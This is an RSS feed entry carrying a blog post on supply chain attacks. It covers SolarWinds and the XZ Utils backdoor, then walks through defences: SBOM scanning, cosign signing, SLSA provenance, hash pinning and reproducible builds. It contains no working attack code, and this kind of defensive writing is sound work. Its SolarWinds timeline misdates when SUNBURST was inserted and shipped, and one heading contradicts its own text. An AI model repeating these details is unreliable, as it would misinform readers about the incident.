<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Linuxcent</title>
	<atom:link href="https://linuxcent.com/feed/" rel="self" type="application/rss+xml" />
	<link>https://linuxcent.com/</link>
	<description>Infrastructure security, from the kernel up.</description>
	<lastBuildDate>Wed, 13 May 2026 15:36:58 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0</generator>

<image>
	<url>https://linuxcent.com/wp-content/uploads/2026/04/favicon-512x512-1-150x150.png</url>
	<title>Linuxcent</title>
	<link>https://linuxcent.com/</link>
	<width>32</width>
	<height>32</height>
</image> 
<site xmlns="com-wordpress:feed-additions:1">211632295</site>	<item>
		<title>Supply Chain Attacks: From SolarWinds to XZ Utils — Detection and Defense</title>
		<link>https://linuxcent.com/supply-chain-attack-solarwinds-xz-utils/</link>
					<comments>https://linuxcent.com/supply-chain-attack-solarwinds-xz-utils/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Tue, 30 Jun 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[Purple Team]]></category>
		<category><![CDATA[CVE-2024-3094]]></category>
		<category><![CDATA[OWASP]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[SolarWinds]]></category>
		<category><![CDATA[Supply Chain]]></category>
		<category><![CDATA[XZ Utils]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1867</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 14</span> <span class="rt-label rt-postfix">minutes</span></span>Supply chain attacks target trust, not code. SolarWinds to XZ Utils anatomy: how 2 years of social engineering almost shipped a backdoor to every major Linux distro.</p>
<p>The post <a href="https://linuxcent.com/supply-chain-attack-solarwinds-xz-utils/">Supply Chain Attacks: From SolarWinds to XZ Utils — Detection and Defense</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 14</span> <span class="rt-label rt-postfix">minutes</span></span><style>
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang)pre.setAttribute('data-lang',lang);
      if(lang){var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;pre.insertBefore(badge,pre.firstChild);}
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=code?code.innerText:pre.innerText;
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  function fb(text,btn){
    try{var ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';document.body.appendChild(ta);ta.select();document.execCommand('copy');document.body.removeChild(ta);ok(btn);}
    catch(e){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  }
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><a href="/what-is-purple-team-security/">What is purple team security</a> → <a href="/owasp-top-10-cloud-infrastructure/">OWASP Top 10 mapped to cloud infrastructure</a> → <a href="/cloud-security-breaches-2020-2025/">Cloud security breaches 2020–2025</a> → <a href="/broken-access-control-aws/">Broken access control in AWS</a> → <a href="/mfa-fatigue-attack/">MFA fatigue attacks</a> → <a href="/cicd-secrets-exposure/">CI/CD secrets exposure</a> → <a href="/ssrf-cloud-metadata-attack/">SSRF to cloud metadata</a> → <a href="/kubernetes-container-escape-attack-paths/">Kubernetes container escape</a> → <strong>Supply Chain Attacks</strong></p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li><strong>Supply chain attack detection</strong> is OWASP A06 + A08: attackers compromise the software build or distribution chain so that legitimate, signed artifacts deliver malicious payloads — standard vulnerability scanning misses this entirely</li>
<li>SolarWinds (December 2020): threat actors compromised the Orion build system in March 2020, waited eight months, inserted the SUNBURST backdoor into a digitally signed update, and reached 18,000+ organizations including the U.S. Treasury, DHS, and DoD</li>
<li>XZ Utils (CVE-2024-3094, March 2024): the &#8220;Jia Tan&#8221; persona spent two years building open-source credibility before inserting a backdoor into release tarballs — the backdoor was not in the git repo, only in the distributed tarball <em>(release tarball = the compressed archive that Linux distributions download to build the package — separate from the git source tree)</em></li>
<li>The XZ backdoor targeted <code class="" data-line="">liblzma</code>, which is linked into <code class="" data-line="">sshd</code> via <code class="" data-line="">systemd</code> on affected distros — a compromised SSH daemon on every major Linux distribution was days away from shipping</li>
<li>Detection relied on human observation: Andres Freund noticed a 500ms SSH connection delay during unrelated benchmarking, traced it with <code class="" data-line="">strace</code>, and found <code class="" data-line="">sshd</code> making unexpected calls into <code class="" data-line="">liblzma</code></li>
<li>The structural fix is a pipeline: pin dependencies with hashes + private artifact registry + SBOM generation + image signing with Sigstore/cosign — each layer catches a different attack class</li>
</ul>
<hr />
<blockquote>
<p><strong>OWASP Mapping:</strong> A06 Vulnerable and Outdated Components — compromised upstream dependencies. A08 Software and Data Integrity Failures — build artifacts not signed or verified; release tarball content not validated against source.</p>
</blockquote>
<hr />
<h2 id="the-big-picture">The Big Picture</h2>
<pre><code class="" data-line="">┌──────────────────────────────────────────────────────────────────────────┐
│                  SUPPLY CHAIN ATTACK SURFACE                             │
│                                                                          │
│   SOURCE REPO          BUILD SYSTEM         ARTIFACT REGISTRY           │
│   github.com/org  ──&#x25b6;  CI/CD pipeline  ──&#x25b6;  container registry / PyPI  │
│        │                    │                      │                     │
│        │                    │                      │                     │
│   ATTACK POINT 1:      ATTACK POINT 2:       ATTACK POINT 3:            │
│   Social engineer      Compromise the        Typosquatting /             │
│   maintainer trust     build host            dependency confusion        │
│   (XZ model)           (SolarWinds model)    (public registry model)    │
│        │                    │                      │                     │
│        └────────────────────┴──────────────────────┘                    │
│                             │                                            │
│                    COMPROMISED ARTIFACT                                  │
│             (signed, valid, ships with legitimate release)               │
│                             │                                            │
│                             ▼                                            │
│        PRODUCTION SYSTEMS (18,000 orgs / every major Linux distro)      │
│                                                                          │
│   ═══════════════════════════════════════════════════════════════        │
│   DETECTION PIPELINE                                                     │
│   Hash pinning + SBOM + Sigstore verify + tarball ≠ git diff check      │
│   Each layer catches a different attack class                            │
└──────────────────────────────────────────────────────────────────────────┘
</code></pre>
<p><strong>Supply chain attack detection</strong> is hard because the artifact being delivered is legitimate by every traditional check: it is signed by the vendor, it passes antivirus, it resolves from the correct registry. The attack happened before the artifact was packaged, inside the trust chain you already approved. SolarWinds and XZ Utils are not anomalies — they are the template.</p>
<hr />
<h2 id="two-incidents-same-attack-surface">Two Incidents — Same Attack Surface</h2>
<h3 id="solarwinds-december-2020">SolarWinds (December 2020)</h3>
<p>The SolarWinds compromise is the definitive build-system attack. The timeline:</p>
<pre><code class="" data-line="">March 2020       Threat actor (UNC2452 / Cozy Bear) gains access to
                 SolarWinds build environment

October 2020     SUNBURST backdoor code inserted into SolarWinds Orion
                 build process — not into the source repository

October 2020     Orion 2019.4 through 2020.2.1 builds produced with
                 SUNBURST included — binaries digitally signed by
                 SolarWinds with their valid code-signing certificate

October–         SUNBURST distributed to ~18,000 customers via the
December 2020    legitimate Orion software update mechanism

December 2020    FireEye detects SUNBURST while investigating their own
                 breach — reports to SolarWinds and CISA
</code></pre>
<p><strong>What made detection almost impossible:</strong></p>
<p>The compiled binary passed every integrity check a customer would run. It was signed with SolarWinds&#8217; legitimate certificate. It installed via the normal software update channel. The SUNBURST code itself was designed for low observability: it dormant for 12–14 days after installation, used legitimate SolarWinds API patterns to blend with normal Orion traffic, and used legitimate cloud infrastructure (Avsvmcloud.com, which resolved to valid cloud provider IPs) for command-and-control.</p>
<p>The C2 communication was disguised as standard Orion telemetry. Exfiltration was slow — the attackers were not bulk-extracting data, they were selecting targets and moving laterally only inside high-value organizations.</p>
<p><strong>The attack vector was the build system, not source code.</strong> SolarWinds source repositories did not contain SUNBURST. The attacker modified the compiled output at build time. A code review of the SolarWinds source would have found nothing.</p>
<hr />
<h3 id="xz-utils-cve-2024-3094-march-2024">XZ Utils (CVE-2024-3094, March 2024)</h3>
<p>The XZ Utils compromise is more instructive because it was social engineering at the package maintainer level, caught before it shipped widely — and the catch was accidental.</p>
<p><strong>Timeline:</strong></p>
<pre><code class="" data-line="">November 2021    GitHub user &quot;Jia Tan&quot; (JiaT75) makes first commit to
                 xz-utils repository

2022–2023        Jia Tan steadily contributes quality patches to xz-utils,
                 builds trust with maintainer Lasse Collin, is eventually
                 granted commit access

Early 2024       Jia Tan accelerates commit activity, coordinates social
                 pressure on Lasse Collin from other fake personas to
                 push releases faster

February 2024    Jia Tan releases xz 5.6.0 — backdoor code inserted in
                 the release tarball build process (not in git commits)

March 9, 2024    xz 5.6.1 released with minor obfuscation changes

March 28–29,     Andres Freund (PostgreSQL/Microsoft engineer) notices
2024             500ms SSH connection delay on his Debian sid machine
                 while running unrelated Valgrind benchmarks

March 29, 2024   Freund traces the delay with strace, finds sshd making
                 unexpected calls into liblzma, reports to oss-security
                 mailing list

March 30, 2024   CISA advisory published. Fedora 40 beta, Debian unstable,
                 openSUSE Tumbleweed had all shipped the affected version.
                 Ubuntu 24.04 LTS was in freeze and had it staged.
</code></pre>
<p><strong>What was backdoored and how:</strong></p>
<p><code class="" data-line="">xz-utils</code> provides the <code class="" data-line="">liblzma</code> compression library. On systemd-based Linux distributions, <code class="" data-line="">sshd</code> links against <code class="" data-line="">libsystemd</code>, which links against <code class="" data-line="">liblzma</code>. The backdoor hooked into <code class="" data-line="">sshd</code>&#8216;s RSA key processing — specifically <code class="" data-line="">RSA_public_decrypt</code> — to allow authentication bypass using a specific attacker-controlled private key.</p>
<p>The backdoor was not in the git repository. It was injected during the tarball release process via obfuscated test files in the repository that were assembled and compiled during the build. Comparing the released tarball to the git tree reveals extra files and code that do not appear in any git commit:</p>
<pre><code class="" data-line="">xz --version
# 5.6.0 or 5.6.1 = affected; 5.4.x = safe

# How Andres Freund found it
# He was running sshd benchmarks and noticed unexpected latency
strace -p $(pgrep sshd) 2&gt;&amp;1 | head -20
# Saw unexpected calls into liblzma that should not be there
# Normal sshd does not call into liblzma at all

# Verify tarball vs git diff (the forensic check)
# If you have both the tarball and git source:
tar xf xz-5.6.1.tar.gz
git clone https://github.com/tukaani-project/xz.git xz-git
diff -r xz-5.6.1/ xz-git/
# Extra files in the tarball that don&#039;t appear in git = compromise indicator
</code></pre>
<p><strong>What makes this attack class so dangerous:</strong></p>
<p>The actor ran a multi-year operation. Two years of legitimate contributions, relationship-building with maintainers, and social pressure coordination across multiple fake personas. The code quality was good — Jia Tan&#8217;s legitimate commits improved xz-utils. The backdoor code was technically sophisticated enough that it took days of analysis to fully reverse-engineer after Freund&#8217;s discovery.</p>
<hr />
<h2 id="red-phase-how-supply-chain-attacks-work-in-practice">Red Phase: How Supply Chain Attacks Work in Practice</h2>
<p>There are three distinct attack surfaces. They require different defenses and catch different attack classes.</p>
<h3 id="1-build-system-compromise-solarwinds-model">1. Build System Compromise (SolarWinds Model)</h3>
<p>The attacker gains access to the CI/CD or build host and modifies compiled artifacts. The source code is clean. Git history is clean. Only the build output is poisoned.</p>
<p><strong>What makes it hard to catch:</strong> legitimate signing certificate, normal distribution channel, artifact passes all integrity checks that consumers run.</p>
<p><strong>Simulation (safe to run in a test environment):</strong></p>
<pre><code class="" data-line=""># Understand your build artifact&#039;s provenance
# Can you trace a production binary back to a specific source commit?

# For a Docker image: inspect build metadata
docker inspect your-org/your-image:latest | \
  jq &#039;.[0].Config.Labels&#039;
# Look for: org.opencontainers.image.revision (git SHA)
#           org.opencontainers.image.source (repo URL)
# If these labels are absent, you cannot verify what source built this image

# For a Go binary: read embedded build info
go version -m /path/to/binary
# Shows: Go version, module path, dependencies with versions and hashes
# If -trimpath was used during build, some info may be stripped

# Check if a container image was built from a known CI workflow
# (assumes SLSA provenance attestation is present)
cosign verify-attestation \
  --type slsaprovenance \
  --certificate-identity-regexp=&quot;.*&quot; \
  --certificate-oidc-issuer=&quot;https://token.actions.githubusercontent.com&quot; \
  your-org/your-image:latest | \
  jq -r &#039;.payload | @base64d | fromjson | .predicate.buildType&#039;
</code></pre>
<h3 id="2-dependency-hijacking-typosquatting-and-dependency-confusion">2. Dependency Hijacking: Typosquatting and Dependency Confusion</h3>
<p><strong>Typosquatting:</strong> a malicious package on PyPI/npm with a name close to a popular package (<code class="" data-line="">requets</code> vs <code class="" data-line="">requests</code>, <code class="" data-line="">djano</code> vs <code class="" data-line="">django</code>). Developers with a typo in their <code class="" data-line="">requirements.txt</code> install the malicious package.</p>
<p><strong>Dependency confusion:</strong> a private internal package (<code class="" data-line="">mycompany-utils</code>) has the same name as a package you upload to the public registry with a higher version number. Package managers that check public registries before private ones will resolve the public (malicious) version.</p>
<pre><code class="" data-line=""># Test for dependency confusion: can your private package names be
# resolved from the public registry?
# Do this in a throwaway environment, NOT production

# For Python: check if your internal package name exists on PyPI
pip index versions your-internal-package-name 2&gt;/dev/null
# If it returns versions and you didn&#039;t publish it there = confusion risk

# For npm: check if your scoped package exists on the public registry
npm view @your-scope/your-package version 2&gt;/dev/null
# An unscoped internal package with a public registry hit = confusion risk

# For pip: audit your requirements for known-bad packages
pip-audit --requirement requirements.txt
# pip-audit checks against the OSV vulnerability database
# Install: pip install pip-audit

# For npm: audit for both vulnerabilities and signature issues
npm audit
npm audit signatures
# &#039;npm audit signatures&#039; verifies that packages in node_modules were
# signed with registry-issued keys — catches tampered downloads
</code></pre>
<h3 id="3-maintainer-compromise-and-social-engineering-xz-model">3. Maintainer Compromise and Social Engineering (XZ Model)</h3>
<p>The hardest attack class to detect from the outside. A trusted maintainer is either compromised or is the attacker. Their commits are signed, their track record is legitimate, the package comes from the canonical repository.</p>
<p><strong>What you can check:</strong></p>
<pre><code class="" data-line=""># Verify a PyPI package hash matches what&#039;s listed in the index
# The hash listed on PyPI is set at upload time — if the file was
# replaced after upload, the hash would change (PyPI prevents this,
# but private/mirror registries may not)
pip download requests==2.31.0 --no-deps --dest /tmp/pkg-check/
sha256sum /tmp/pkg-check/requests-2.31.0-py3-none-any.whl
# Compare to the hash shown at pypi.org/project/requests/2.31.0/#files

# Check npm package signatures (post-XZ hygiene)
npm audit signatures
# Output shows: verified (good), missing (not signed), invalid (tampered)

# For containers: verify Sigstore signature
cosign verify \
  --certificate-identity-regexp=&quot;.*&quot; \
  --certificate-oidc-issuer=&quot;https://token.actions.githubusercontent.com&quot; \
  ghcr.io/your-org/your-image:latest
# If this fails: the image was not built by the expected GitHub Actions workflow
</code></pre>
<hr />
<h2 id="blue-phase-detection">Blue Phase: Detection</h2>
<h3 id="slsa-what-level-your-pipeline-should-be-at">SLSA: What Level Your Pipeline Should Be At</h3>
<p>SLSA (Supply chain Levels for Software Artifacts) is a framework for build pipeline integrity. Four levels:</p>
<pre><code class="" data-line="">SLSA Level 1  Build process is scripted/automated, produces provenance
              Most teams can reach this today
              Catches: accidental modifications, basic auditability

SLSA Level 2  Build runs on a hosted, version-controlled build platform
              (GitHub Actions, GitLab CI) — provenance is signed by the
              build platform, not just the developer
              Catches: developer workstation compromise

SLSA Level 3  Hermetic builds — the build environment is isolated from
              the network, cannot pull external resources at build time
              Provenance is non-forgeable
              Catches: build-time dependency injection, most CI/CD attacks

SLSA Level 4  (deprecated in SLSA v1.0, merged into L3)

Most teams should target SLSA Level 2 now, Level 3 within 6 months.
Level 3 is where SolarWinds-class attacks become detectable.
</code></pre>
<h3 id="container-image-signing-with-sigstorecosign">Container Image Signing with Sigstore/cosign</h3>
<pre><code class="" data-line=""># Sign a container image after build (in CI, using OIDC — no stored key)
# This runs inside GitHub Actions after the docker push step
cosign sign \
  --yes \
  ghcr.io/your-org/your-image:${GITHUB_SHA}
# cosign uses the GitHub Actions OIDC token to sign — no private key needed
# The signature is stored in the registry alongside the image

# Verify the signature and check the certificate claims
cosign verify \
  --certificate-identity=&quot;https://github.com/your-org/your-repo/.github/workflows/build.yml@refs/heads/main&quot; \
  --certificate-oidc-issuer=&quot;https://token.actions.githubusercontent.com&quot; \
  ghcr.io/your-org/your-image:latest | \
  jq &#039;.[0] | {
    issuer: .optional.Issuer,
    workflow: .optional.BuildSignerURI,
    repo: .optional.SourceRepositoryURI,
    ref: .optional.SourceRepositoryRef
  }&#039;
# A passing verification means:
# - Image was built by a specific GitHub Actions workflow
# - In a specific repository, on a specific branch
# - At a specific time (cert has a 10-minute TTL)
</code></pre>
<h3 id="sbom-generation-and-vulnerability-scanning">SBOM Generation and Vulnerability Scanning</h3>
<p>An SBOM (Software Bill of Materials) enumerates every component in a software artifact. Without an SBOM, you cannot answer &#8220;are we affected by the XZ backdoor?&#8221; across your fleet in under an hour.</p>
<pre><code class="" data-line=""># Generate an SBOM for a container image using syft
syft your-org/your-image:latest -o cyclonedx-json &gt; sbom.json
# syft walks the image layers and catalogs every package,
# including OS packages (rpm/deb), language packages (pip/npm/go),
# and their versions

# Inspect what syft found
cat sbom.json | jq &#039;.components[] | select(.name == &quot;xz-libs&quot;) | {name, version, purl}&#039;
# Example output:
# {
#   &quot;name&quot;: &quot;xz-libs&quot;,
#   &quot;version&quot;: &quot;5.4.4-1.el9&quot;,    ← 5.4.x = safe; 5.6.0/5.6.1 = backdoored
#   &quot;purl&quot;: &quot;pkg:rpm/redhat/xz-libs@5.4.4-1.el9?arch=x86_64&quot;
# }

# Scan the SBOM for known vulnerabilities
grype sbom:./sbom.json
# grype checks each component against Grype&#039;s vulnerability database
# (CVE, GHSA, OSV) — would have flagged CVE-2024-3094 once published

# Automate: generate SBOM and scan in CI, fail build if critical CVEs found
grype sbom:./sbom.json --fail-on critical
</code></pre>
<h3 id="build-provenance-with-github-actions-slsa-level-23">Build Provenance with GitHub Actions (SLSA Level 2/3)</h3>
<pre><code class="" data-line=""># .github/workflows/build.yml
# Adds SLSA provenance attestation to every release artifact
name: Build and attest

on:
  push:
    tags: [&quot;v*&quot;]

permissions:
  contents: write
  id-token: write       # Required for OIDC signing
  attestations: write   # Required for GitHub attestation API

jobs:
  build:
    runs-on: ubuntu-latest
    outputs:
      image-digest: ${{ steps.push.outputs.digest }}
    steps:
      - uses: actions/checkout@v4

      - name: Build and push container image
        id: push
        uses: docker/build-push-action@v5
        with:
          push: true
          tags: ghcr.io/${{ github.repository }}:${{ github.ref_name }}

      - name: Generate SLSA provenance attestation
        uses: actions/attest-build-provenance@v1
        with:
          subject-name: ghcr.io/${{ github.repository }}
          subject-digest: ${{ steps.push.outputs.digest }}
          push-to-registry: true
          # This generates a signed SLSA provenance statement that records:
          # - Which workflow built this artifact
          # - The git SHA it was built from
          # - The trigger event
          # Stored alongside the image in the registry
</code></pre>
<pre><code class="" data-line=""># Verify the attestation against an image
gh attestation verify \
  oci://ghcr.io/your-org/your-image:latest \
  --owner your-org
# Passes: image provenance is traceable to a specific workflow run
# Fails: image was built and pushed outside any attested workflow
</code></pre>
<h3 id="what-anomaly-detection-catches">What Anomaly Detection Catches</h3>
<p>Sigstore and SBOM scanning catch known-bad artifacts. Anomaly detection catches behavior that hasn&#8217;t been classified yet:</p>
<ul>
<li><strong>Unexpected external connections during build:</strong> a hermetic build should make zero network calls after dependency fetch. Any egress during the build phase is a signal — a compromised build tool phoning home, a dependency pulling a secondary payload at install time</li>
<li><strong>Artifact hash drift:</strong> if the same source commit produces different binary output on two consecutive builds, the build environment is non-deterministic at best, compromised at worst. Reproducible builds produce identical byte-for-byte output from identical inputs — hash drift indicates something in the build environment changed</li>
<li><strong>New dependency additions without PR:</strong> any dependency that appears in a build artifact but was not added via a reviewed pull request is an anomaly. SBOMs make this comparison possible; without them it is invisible</li>
</ul>
<pre><code class="" data-line=""># Check for unexpected network connections during a build
# Run this on the build host during a CI job
ss -tnp | grep -E &quot;(ESTABLISHED|SYN_SENT)&quot;
# Any connection to an IP outside your artifact registry and SCM = investigate

# Compare artifact hashes across two builds of the same commit
# (tests build reproducibility)
docker pull ghcr.io/your-org/your-image@sha256:&lt;first-build-digest&gt;
docker pull ghcr.io/your-org/your-image@sha256:&lt;second-build-digest&gt;
# If the digests differ for the same source commit, investigate
</code></pre>
<hr />
<h2 id="purple-phase-structural-fixes">Purple Phase: Structural Fixes</h2>
<h3 id="1-pin-dependencies-with-hashes-not-just-versions">1. Pin Dependencies with Hashes — Not Just Versions</h3>
<p>Version pinning (<code class="" data-line="">requests==2.31.0</code>) pins the version number. The package maintainer can yank and re-upload that version with different content on some registries. Hash pinning locks the exact file bytes:</p>
<pre><code class="" data-line=""># requirements.txt — hash-pinned
requests==2.31.0 \
    --hash=sha256:58cd2187423839e4e2d07f6f16c9cd680e74d6066237a4e1e88f06fc4a3e2e56 \
    --hash=sha256:942c5a758f98d790eaed1a29cb6eefc7ffb0d1cf7af05c3d2791656dbd6ad1e1
# Two hashes because the package ships both a wheel and a source tarball
# pip verifies the downloaded file matches one of these hashes before installing

# Generate hash-pinned requirements from a working environment
pip-compile --generate-hashes requirements.in --output-file requirements.txt
# pip-compile resolves the full dependency tree and writes pinned+hashed output
</code></pre>
<p>For containers, pin base images by digest, not by tag:</p>
<pre><code class="" data-line=""># Vulnerable: mutable tag
FROM python:3.11-slim

# Secure: pinned digest
FROM python:3.11-slim@sha256:6a37af1bde8be89040f70b9e93f2f61b5f14e99d7e49f9ea3dc7ded2e1c82f7b
# The digest is immutable — this exact image layer will always be fetched,
# regardless of what the 3.11-slim tag points to in the future
</code></pre>
<h3 id="2-private-artifact-registry-no-direct-pypi-or-npm-in-production-ci">2. Private Artifact Registry — No Direct PyPI or npm in Production CI</h3>
<p>A private registry (Artifactory, Nexus, AWS CodeArtifact, Google Artifact Registry) proxies upstream registries and caches approved packages. Benefits:</p>
<ul>
<li><strong>Dependency confusion protection:</strong> your CI resolves <code class="" data-line="">mycompany-utils</code> from your private registry first, never from public PyPI</li>
<li><strong>Availability independence:</strong> a PyPI outage does not break your builds</li>
<li><strong>Audit trail:</strong> every package version pulled in every build is logged</li>
<li><strong>Policy enforcement:</strong> you can block packages with unacceptable licenses or CVE scores</li>
</ul>
<pre><code class="" data-line=""># Configure pip to use a private registry proxy exclusively
# In ci/pip.conf or as environment variable
export PIP_INDEX_URL=&quot;https://your-artifactory.company.com/artifactory/api/pypi/pypi-virtual/simple/&quot;
export PIP_TRUSTED_HOST=&quot;your-artifactory.company.com&quot;
# No direct PyPI access — all packages go through your registry proxy

# For npm: configure registry in .npmrc
echo &quot;registry=https://your-artifactory.company.com/artifactory/api/npm/npm-virtual/&quot; &gt; .npmrc
echo &quot;always-auth=true&quot; &gt;&gt; .npmrc
</code></pre>
<h3 id="3-reproducible-builds-same-input-produces-same-output">3. Reproducible Builds — Same Input Produces Same Output</h3>
<p>Reproducible builds allow independent verification: a third party can take the same source and build environment and produce a byte-for-byte identical artifact. If the published artifact does not match, something changed between source and distribution.</p>
<p>This is exactly how the XZ tarball compromise would have been caught earlier with proper tooling: the release tarball did not match what would be produced by checking out the git tag and running the build.</p>
<pre><code class="" data-line=""># For Go: builds are reproducible by default in Go 1.13+
# Verify by building twice and comparing
go build -o binary-1 ./cmd/...
go build -o binary-2 ./cmd/...
sha256sum binary-1 binary-2
# Identical hashes = reproducible

# For containers with BuildKit: use --no-cache and compare digests
DOCKER_BUILDKIT=1 docker build --no-cache -t test-1 .
DOCKER_BUILDKIT=1 docker build --no-cache -t test-2 .
docker inspect test-1 test-2 | jq &#039;.[].Id&#039;
# Identical IDs = reproducible build environment

# SOURCE_DATE_EPOCH forces reproducible timestamps (common reproducibility blocker)
export SOURCE_DATE_EPOCH=$(git log -1 --format=%ct)
make  # or whatever your build command is
</code></pre>
<h3 id="4-separate-build-and-release-environments">4. Separate Build and Release Environments</h3>
<p>SolarWinds built and signed in the same compromised environment. The build environment had signing keys. An attacker who owns the build host owns the signing operation.</p>
<pre><code class="" data-line="">INSECURE:                           SECURE:

Build host ──&#x25b6; compile              Build host ──&#x25b6; compile
           ──&#x25b6; sign artifact                   ──&#x25b6; output unsigned artifact
           ──&#x25b6; publish                                    │
                                                          ▼
                                    Separate signing host (air-gapped or HSM)
                                                    ──&#x25b6; verify artifact hash
                                                    ──&#x25b6; sign with HSM key
                                                    ──&#x25b6; publish signed artifact
</code></pre>
<p>In practice: signing keys should live in a hardware security module (HSM) or KMS, not on the build host. The build produces an artifact hash; the signing service receives only the hash, not the full artifact, and signs it with the HSM-protected key. Build host compromise does not yield the signing key.</p>
<h3 id="5-sbom-in-every-release-non-negotiable">5. SBOM in Every Release — Non-Negotiable</h3>
<p>If you cannot enumerate what is in your artifact, you cannot answer supply chain compromise questions. When CVE-2024-3094 dropped, every organization with an SBOM could query it in minutes. Organizations without one had to manually inspect every container image and every deployed system.</p>
<pre><code class="" data-line=""># Attach SBOM to a container image as an attestation (stored in registry)
syft ghcr.io/your-org/your-image:latest -o cyclonedx-json | \
  cosign attest \
    --predicate /dev/stdin \
    --type cyclonedx \
    ghcr.io/your-org/your-image:latest
# The SBOM is now stored alongside the image and signed with OIDC credentials

# Later: retrieve and search the SBOM
cosign verify-attestation \
  --type cyclonedx \
  --certificate-identity-regexp=&quot;.*&quot; \
  --certificate-oidc-issuer=&quot;https://token.actions.githubusercontent.com&quot; \
  ghcr.io/your-org/your-image:latest | \
  jq -r &#039;.payload | @base64d | fromjson | .predicate.components[] | 
    select(.name == &quot;xz-libs&quot;) | {name, version}&#039;
</code></pre>
<hr />
<h2 id="production-gotchas"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Production Gotchas</h2>
<p><strong>Hash pinning breaks automated dependency update workflows.</strong> When you pin with hashes, tools like Dependabot and Renovate still open PRs, but they must also update the hashes. This works — both tools support hash pinning — but you must configure them explicitly. Without hash update support in your automation, developers will remove pinning to unblock themselves.</p>
<p><strong>SLSA Level 3 requires hermetic builds — most teams are not ready.</strong> Hermetic means the build process makes no network calls during compilation (all dependencies fetched in a prior, logged step). Most existing CI pipelines fetch dependencies during the build step. Reaching SLSA Level 3 requires restructuring your pipeline into explicit fetch → build phases. Start at Level 2 (hosted, signed provenance) and treat Level 3 as a 6-month target.</p>
<p><strong>SBOMs without a query workflow are paperwork.</strong> Generating an SBOM with <code class="" data-line="">syft</code> and storing it somewhere is the easy part. The useful part is having a process to query all SBOMs across your fleet within minutes of a new CVE. Without that query infrastructure, you have documentation, not detection capability.</p>
<p><strong>Cosign verify fails silently if no signature exists.</strong> By default, if an image has no cosign signature, <code class="" data-line="">cosign verify</code> returns an error — which is correct. But in a Kubernetes admission webhook that enforces signing (e.g., Kyverno, OPA/Gatekeeper), an unsigned image must be an explicit policy violation, not a webhook error that gets bypassed by a fail-open configuration. Always run admission webhooks in fail-closed mode.</p>
